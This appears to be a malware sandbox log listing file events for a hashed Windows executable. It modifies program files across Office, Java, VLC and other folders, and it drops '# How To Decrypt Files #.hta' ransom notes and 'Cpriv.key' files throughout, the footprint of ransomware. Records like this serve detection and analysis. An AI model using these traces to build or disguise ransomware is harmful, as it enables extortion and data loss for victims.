de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187851.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0234000.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSACCESS_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21400_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL065.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\NAVBAR11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\CONCRETE\CONCRETE.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00235_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hardware Tracker.fdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\1033\DELIMR.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePage.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Perspective.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Author2String.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07761_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_center.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\CrashReports\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Portable Devices\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SATIN\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Fancy.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGBORDER.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_sun.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_windy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01560_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\si\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\fa.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14870_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-util-enumerations.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ApothecaryResume.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\timer_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Mail\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Opulent.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18202_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_disabled.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MEDIA\COIN.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\INFOPATHEDITOR_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\LoanAmortization.xltx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_TW.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FORM.JS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18214_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PAGESIZE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00095_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Outlook.en-us\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151061.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0187423.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00603_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL105.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\js\slideShow.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105244.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107480.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Skins\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FLAP.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN010.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\modules\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\et.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\MEIPreload\manifest.json de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR1B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Aspect.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01039_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152694.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21370_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKDECS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-charts.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05869_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\CONTACTL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00233_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR23F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\DADSHIRT.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ApothecaryNewsletter.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\vintage.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02746G.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00382_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGACCBAR.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\SATIN\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21325_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_fr.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00932_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01182_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0295241.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\FOLDPROJ.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\LAYERS\LAYERS.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SONORA\SONORA.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Microsoft.Office.Interop.InfoPath.Xml.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Opulent.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15273_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_bottom.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\OrangeCircles.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\MedianReport.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\on_desktop\slideshow_glass_frame.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178632.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignleft.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\# How To Decrypt Files #.hta 